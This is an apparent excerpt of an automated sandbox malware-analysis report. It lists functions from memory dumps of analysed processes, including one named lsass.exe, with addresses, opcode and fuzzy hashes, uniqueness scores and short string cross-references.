Opcode Fuzzy Hash: 2d8c30051eee422c42db2909002fb3bbf605e5f18a7ec27d4359ac5296119e5b
Instruction Fuzzy Hash: 8F019E31C8C2894FF7179BA448569E93FB4EF03314F0681B7E44CC7292D92D6695C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230EC0, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6033737c7a9b41ab852e34620ff6931c428eea1cc36f4a1654e31aed3f42ceea
Instruction ID: d657d3349c1dd396d6d8bf8eef1673cf68ef2720b293d1cdaec573e99463b7f4
Opcode Fuzzy Hash: 6033737c7a9b41ab852e34620ff6931c428eea1cc36f4a1654e31aed3f42ceea
Instruction Fuzzy Hash: D211052184E3C14FE3139BB048656A07FB0AF47215F1E45EBD8C9CB1E3DA6E1859D762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36231383, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca69a154569e9965f705bdce5c0480f817e336db3ea76242de34cd1ec13e31d1
Instruction ID: bd891722e314dc28338143e413bb720142e3fd65d2c2e514bbd6381eba588711
Opcode Fuzzy Hash: ca69a154569e9965f705bdce5c0480f817e336db3ea76242de34cd1ec13e31d1
Instruction Fuzzy Hash: 0901F136E0C2884FE701ABA9A8189E97FA4EF43211F0900B7E50CC3292DE341418D711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362309B9, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7b1a5e2ed88f4be3f95f46e7aafae3918334a1db6e18005a108962ab9eb5b9
Instruction ID: cd1c2daa458571d26369d6a0a4d5bb6a0669b43a6bb2df6c3a76151ded52c93c
Opcode Fuzzy Hash: 7c7b1a5e2ed88f4be3f95f46e7aafae3918334a1db6e18005a108962ab9eb5b9
Instruction Fuzzy Hash: 50110130C0D38A8FF7118F94C814AFE7BB0AF06311F218176E088922C2DF785644D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36237DB1, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3db84867d1d7130cd7fc4d7a11056208f925325960cab48b417a50a83fc2ed0
Instruction ID: a94f7721345e4e6b20519b4cf759269a9e5ad909027ef20ea856fabb3b1ae057
Opcode Fuzzy Hash: c3db84867d1d7130cd7fc4d7a11056208f925325960cab48b417a50a83fc2ed0
Instruction Fuzzy Hash: CA017C71908A8D8FDF94DF68C888AA93FE0FF69301F1140AAE408C7261CB34D590CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238F69, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 141204cc5e1561a7fe9b0266f7d915afdd6df5d48ca7a22a703b2035d47723d7
Instruction ID: 06a6a0a301f43be272156becae695c7494bfcb060cab32655a3ae3c1b6f50783
Opcode Fuzzy Hash: 141204cc5e1561a7fe9b0266f7d915afdd6df5d48ca7a22a703b2035d47723d7
Instruction Fuzzy Hash: 1101717090868D8FDB91EF68C845AA93FF1FF6A311F5541A6E84CC7262C738D454CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623EA35, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4badd8ffa43fce4d14f0d6a5c1ac902c7437677a1f679eb99bbf2d6f523b73
Instruction ID: 32d24e205161fc48f351d9e92fd8e61e36199fd67f8c21b7b5f371a13095be0c
Opcode Fuzzy Hash: 4a4badd8ffa43fce4d14f0d6a5c1ac902c7437677a1f679eb99bbf2d6f523b73
Instruction Fuzzy Hash: A301DF71D086898FEB54AFA488196B97FF0FF06200F0551BBE44CC2282CE3865588B42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36237C29, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a86a063c3140197fb0cf5c6ef3c6222af830d8c08ba95f7b5737c2a5bf76f56a
Instruction ID: 4a437254f1432d5869c4f3bebf01527a82e03a9fce5212b064b651e820fa6fbb
Opcode Fuzzy Hash: a86a063c3140197fb0cf5c6ef3c6222af830d8c08ba95f7b5737c2a5bf76f56a
Instruction Fuzzy Hash: 96015E7180CA8D8FEF81EF588888A993FF0FF29300F1544A6E408C72A2DB35D554CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230E5F, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b87688d1595ccb07370e0cd05c7f119d600d50df106ab38da66fdc72a755db2
Instruction ID: be8f4895da3f1c8ca54095b532bf4da5478982f429efa39bafb3f89c0c22df34
Opcode Fuzzy Hash: 7b87688d1595ccb07370e0cd05c7f119d600d50df106ab38da66fdc72a755db2
Instruction Fuzzy Hash: 2B01C230D1461E8FEB84EB94C854AACB7B1FF59300F61513AE44DE72A6DF746940DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238E11, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b160039c835854ea0bb188f9aa26604ef2b63c6b904eef0f1ec55da993a14aaa
Instruction ID: 15e9cc3ce4cb3d1389594407319b879fca32a8b9ad9e3c7d3f9ee62ed0083187
Opcode Fuzzy Hash: b160039c835854ea0bb188f9aa26604ef2b63c6b904eef0f1ec55da993a14aaa
Instruction Fuzzy Hash: F7F0B43180D38ECFEB65AF5488421E93FA0FF56300F1146B9F80C8A292CB79D450CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238FD1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167602ae8890a69a14470168b70145010619b1a7bc1e9f73ee2cfd808184cab7
Instruction ID: c97aaed16f69672918c6349db67dc25fc49f67037d69da726f1b80207dbd6946
Opcode Fuzzy Hash: 167602ae8890a69a14470168b70145010619b1a7bc1e9f73ee2cfd808184cab7
Instruction Fuzzy Hash: 08F06D31C186888FEB549FA888496A87BA0EF56300F5151BAE80CC6292EB799550DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362313BD, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0557443f2f2c730e1b92a10e2f86f2fe605b45cf6cb3ce4e3bf8f5c7b60884f5
Instruction ID: 1b72103894baa59f2baa634ce0efb68036092d29d4e9a476df1cb2574b7219da
Opcode Fuzzy Hash: 0557443f2f2c730e1b92a10e2f86f2fe605b45cf6cb3ce4e3bf8f5c7b60884f5
Instruction Fuzzy Hash: 1DF08C31D0C7898FEB52ABA888589A97FB4AF17204F0910A7E40CC7293DF356964C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230D0F, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4634646901a7de6e6c8b38fda3ea422230de33250a76c3351f6871c50cef43ca
Instruction ID: f8256dc3388fec5281ee526757c9f182dd006ea5b19b37264d4535ce63dc9d0d
Opcode Fuzzy Hash: 4634646901a7de6e6c8b38fda3ea422230de33250a76c3351f6871c50cef43ca
Instruction Fuzzy Hash: 99012C70A0861A8BEB58DB84C850ABE77F1FF46300F618139D44AE3290CF7469049B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E965, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bed7d0d033f111762f10eaad5d4bed2d310683441d22f98d61f96cdc14925c
Instruction ID: 5d5b5ebaacee148c9b55253c4732355e160f9ec272cb7c0987b1170e6da5244c
Opcode Fuzzy Hash: b0bed7d0d033f111762f10eaad5d4bed2d310683441d22f98d61f96cdc14925c
Instruction Fuzzy Hash: 33F0A471C0C68ACFEB94EF9488166E97FE0EF16300F0585B7E44D962C3DE7964189702

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230D57, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction ID: 7729db8a8310b11db25138294d9be6ebe23ac658d2794d50e1352289ede0bb87
Opcode Fuzzy Hash: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction Fuzzy Hash: C201A870D4860E8BEB50DF94C844AFD77F1EF16310F215635E459E2391DFB5A5409B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238F80, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98c1a67688fd22f21da6fcef5f62fe34f0a91c5a95971e12761102736346fed
Instruction ID: 1838b87ba577b0e981455cdfddaf088fee433459edc54b0f11bf09a2f8d9786b
Opcode Fuzzy Hash: f98c1a67688fd22f21da6fcef5f62fe34f0a91c5a95971e12761102736346fed
Instruction Fuzzy Hash: 0BF0173090890D8FDF80EF68C848AAA7BE1FF28300F5045A6F81CC7261CB34E5A0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623F146, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9056fa6df4b2a345e88e918f2e8be24197d4456dd97c0b0f4988b3ae675697dd
Instruction ID: 1f4ecec5a1930811b2839dfcb03d216ddf2ed8e2c5c44017afa55d8e91970249
Opcode Fuzzy Hash: 9056fa6df4b2a345e88e918f2e8be24197d4456dd97c0b0f4988b3ae675697dd
Instruction Fuzzy Hash: 24F06D70E1C91D8FEF90EB98E880AECB7B1FB5A300F605065E00DE3252CE3968449B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230680, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5daeb0514128f6b51e9b67ee5b68d1434487b18eca5ff58b1813d155d7d603
Instruction ID: ed715747810bc8fda8ca358cf2e03ca673c53b4d81fb6aed3b94b8e85d71576d
Opcode Fuzzy Hash: 5a5daeb0514128f6b51e9b67ee5b68d1434487b18eca5ff58b1813d155d7d603
Instruction Fuzzy Hash: 92F0F071C0864E4EF768A7A89408BBC7BE0AF86310F106476E08CC2284CF3914D4CA11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623C929, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6fabe702274d4b22ffee7fa592f3779e37050e37e690eaebf4d9a2a53bd9a9
Instruction ID: 4c8e21cfc23a737131cd9dc7a1f3487004764cc0dcaa144405b72aa31c47e7e2
Opcode Fuzzy Hash: 0b6fabe702274d4b22ffee7fa592f3779e37050e37e690eaebf4d9a2a53bd9a9
Instruction Fuzzy Hash: BEF0AF30D0D6894FEB51AF6488596A87FB0EF07300F0680E6E40CCA292DB39A454C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238721, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731addaf05ba2fc1afadd13f02a653156af567d4c66db7a2dec5a2d8200b245b
Instruction ID: 3adda69a843c4c143c83b673a14fcae9d684032887d00848ccc99fe8d9074e3c
Opcode Fuzzy Hash: 731addaf05ba2fc1afadd13f02a653156af567d4c66db7a2dec5a2d8200b245b
Instruction Fuzzy Hash: 0DF09A35D1868D9FFB64EFA888185E87BE0EF06300F5098BAE80CCA291DF3A6550D741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623FE75, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d638d6fe4978d2e8b1681a28777b27a60bf1eb4cb87f8b51efb2259c4ef60194
Instruction ID: 9f90cccfe854d5fc816f991d9131a0444e299e8ba845d96d5abbbefc565dbd20
Opcode Fuzzy Hash: d638d6fe4978d2e8b1681a28777b27a60bf1eb4cb87f8b51efb2259c4ef60194
Instruction Fuzzy Hash: ECF0E271C0C3888FEB50ABA4484D6E87FE0EF06300F1184F6E50CC6282DA395544C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623E89D, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229eb80c42f8c4a2070c5074eec1b250544f4a10f7eef9a117a6a3cf8746a845
Instruction ID: 4f3e24ceb9c98d427f3c4bd947849fd96d4068a26eb8fa8fb71030205bd7be68
Opcode Fuzzy Hash: 229eb80c42f8c4a2070c5074eec1b250544f4a10f7eef9a117a6a3cf8746a845
Instruction Fuzzy Hash: AAF0F031C0D2858FE720ABA4482A6E97B90AF13300F0481B7E04C86293CE296508A742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36238590, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de9872c09478328d63354e9cc01de6e4160e5059655de67debbd222176603da
Instruction ID: 16d20695e544e1628d91c0ccfd901b24964451742c5d36f6f4723ce3c88ac48e
Opcode Fuzzy Hash: 1de9872c09478328d63354e9cc01de6e4160e5059655de67debbd222176603da
Instruction Fuzzy Hash: F5F03930C1860D9EEB61EFA8884AAF977E4FF49308F409576E81DD2291DE3466A4CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623C940, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3598013fc8bc09135cd87ee8b95c4ae3abe198d60ea1e1dab45e3e7c438a780
Instruction ID: cd18b9faa00c1669e4e956092b31307530979d9c240d4256dca4d87cd7bcaad8
Opcode Fuzzy Hash: c3598013fc8bc09135cd87ee8b95c4ae3abe198d60ea1e1dab45e3e7c438a780
Instruction Fuzzy Hash: 98E03930D2894D8EEB90EFA88849AF977E4FB0A704F519476A80CD2290DF3461A0CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36230DA5, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2ec8d0e25ed28eb1e507b2ff56b38257122189a5f8f92f94b4d5972d16d43a
Instruction ID: e7ebbaabb3c674941aacd85a034f57cd01681aaa7ef4aba946b67bd94ee74e2b
Opcode Fuzzy Hash: 8a2ec8d0e25ed28eb1e507b2ff56b38257122189a5f8f92f94b4d5972d16d43a
Instruction Fuzzy Hash: 17E0ED30E0850E8BEB54EB80D854DFD73B1EF5A310F215639E05ED3395CFB969009654

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362307F4, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f99ec1ba82589908a94208b833c3f771584eb5e3767330b198a2ae795db8b61
Instruction ID: 0320689b3575166f0292e484245dd1b7b6091bcbe744bf48150589b5dbd5e09b
Opcode Fuzzy Hash: 9f99ec1ba82589908a94208b833c3f771584eb5e3767330b198a2ae795db8b61
Instruction Fuzzy Hash: 5BE01A30D4D10B8AF714AB808844ABE7274AF12355F22E531E05E86386CF3D6545AEA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA3623CB07, Relevance: 8.9, Strings: 7, Instructions: 170COMMON

Download Yara Rule

Strings

[, xrefs: 00007FFA3623D5B5
', xrefs: 00007FFA3623D52C
-, xrefs: 00007FFA3623D604
", xrefs: 00007FFA3623CCB0
/, xrefs: 00007FFA3623CF2D
", xrefs: 00007FFA3623CBF4
}, xrefs: 00007FFA3623CB6D

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: "$"$'$-$/$[$}
API String ID: 0-631831671
Opcode ID: 70f2eb3eb07293bbd9d306acc476b0200c97c7b5a8acbf9f5d4c6b2ca276a820
Instruction ID: c9dc5a420fd0893a536c8f606c46b5ceae65b5699fab7c39b15af174b1024a97
Opcode Fuzzy Hash: 70f2eb3eb07293bbd9d306acc476b0200c97c7b5a8acbf9f5d4c6b2ca276a820
Instruction Fuzzy Hash: 8D81F670E142298FEB68DF55C894BFDB6B1AF55301F2190BAE44DA6390CF395A84EF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623A521, Relevance: 6.3, Strings: 5, Instructions: 90COMMON

Download Yara Rule

Strings

{, xrefs: 00007FFA3623A535
], xrefs: 00007FFA3623B8D9
k, xrefs: 00007FFA3623B838
E, xrefs: 00007FFA3623B90E
H, xrefs: 00007FFA3623B871

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: E$H$]$k${
API String ID: 0-2038897844
Opcode ID: 769141677223d956ed16ca365f3f85d8cfbf45707186cc1395d7ffc653ba5fcf
Instruction ID: 75c8fb2314f18ec9fcc927e6ab1fe6617b59da1da6d8ff98638591a061ab42e6
Opcode Fuzzy Hash: 769141677223d956ed16ca365f3f85d8cfbf45707186cc1395d7ffc653ba5fcf
Instruction Fuzzy Hash: C1411770D0866A8FEB68DF54C894BEDB6B1BB55302F1181FAE00DA6781CB795AC4DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362384A5, Relevance: 6.3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

Strings

^_^[, xrefs: 00007FFA36238579
^_^G, xrefs: 00007FFA3623852A
*, xrefs: 00007FFA362384E9
^_^Y, xrefs: 00007FFA36238572
^_^E, xrefs: 00007FFA36238522

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: *$^_^E$^_^G$^_^Y$^_^[
API String ID: 0-3603620872
Opcode ID: 067dc5b872646290afb03e532c7c34efa9b0b1cd193774c8544638a4b7fb447e
Instruction ID: c3bae5b1d72f67f2d733b0e231f98a91db2e6c3edcebb8f2ae161a011871f9f6
Opcode Fuzzy Hash: 067dc5b872646290afb03e532c7c34efa9b0b1cd193774c8544638a4b7fb447e
Instruction Fuzzy Hash: D621C5739042195A96107B7EB8923DC3B91DF61B71B1041B2C6AC8A062DE293DCA8FD4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362384C8, Relevance: 6.3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

Strings

^_^[, xrefs: 00007FFA36238579
^_^G, xrefs: 00007FFA3623852A
*, xrefs: 00007FFA362384E9
^_^Y, xrefs: 00007FFA36238572
^_^E, xrefs: 00007FFA36238522

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: *$^_^E$^_^G$^_^Y$^_^[
API String ID: 0-3603620872
Opcode ID: 63333d05c5241f480ba48456545efa2b49ad2681c550d6972827e95cdb83dfca
Instruction ID: a9169f7967da4d9ab13a72096a0415baee868d3fe9b94dc63d9ebc1958ddd44f
Opcode Fuzzy Hash: 63333d05c5241f480ba48456545efa2b49ad2681c550d6972827e95cdb83dfca
Instruction Fuzzy Hash: 3011B6739142195AD7107F7EB8A33DC3B91DB61B71F1045B6CAAC8A062DE293CCA4E94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362384D0, Relevance: 6.3, Strings: 5, Instructions: 64COMMON

Download Yara Rule

Strings

^_^[, xrefs: 00007FFA36238579
^_^G, xrefs: 00007FFA3623852A
*, xrefs: 00007FFA362384E9
^_^Y, xrefs: 00007FFA36238572
^_^E, xrefs: 00007FFA36238522

Memory Dump Source

Source File: 0000000D.00000002.733369241.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffa36230000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: *$^_^E$^_^G$^_^Y$^_^[
API String ID: 0-3603620872
Opcode ID: 05497c9a5c7a7f00147928f13fad71773fa496e4dfe2d040bef8c86f3f72cfaf
Instruction ID: 066186f1ad47394291d3dc51590bd04b5233dbc7afd65c5735b46eeed4dd8a96
Opcode Fuzzy Hash: 05497c9a5c7a7f00147928f13fad71773fa496e4dfe2d040bef8c86f3f72cfaf
Instruction Fuzzy Hash: 6E11C8739142195A97107F7EB8A33DC3791DB61B71F1041B5CAAC8A062DE253CCA4E94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lsass.exe PID: 2936 Parent PID: 968 lsass.exeCOMMON

Executed Functions

Function 00007FFA3626ADAB, Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

8, xrefs: 00007FFA3626ADB8
T\_H, xrefs: 00007FFA3626A3CF

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: 8$T\_H
API String ID: 0-155675327
Opcode ID: 56ad98473a0472010311235f483be76b3c36be42e9cd19a9312bf7a9674914ae
Instruction ID: e76943d94b8f2bdc34763a4e778782e9090acb64d13facd475fc96860149a604
Opcode Fuzzy Hash: 56ad98473a0472010311235f483be76b3c36be42e9cd19a9312bf7a9674914ae
Instruction Fuzzy Hash: D6312971E087198BEBA4DB6888557A8B7F1FB65300F4191FAD00DE3291DE756A80CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626CDD4, Relevance: 2.5, Strings: 2, Instructions: 35COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFA3626CF2D
, xrefs: 00007FFA3626CE23

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: $/
API String ID: 0-2637513485
Opcode ID: a7fe9d05c9189f85d80cb56ca6b8ce23041fd3f9fa34225cdfdd522976dd0128
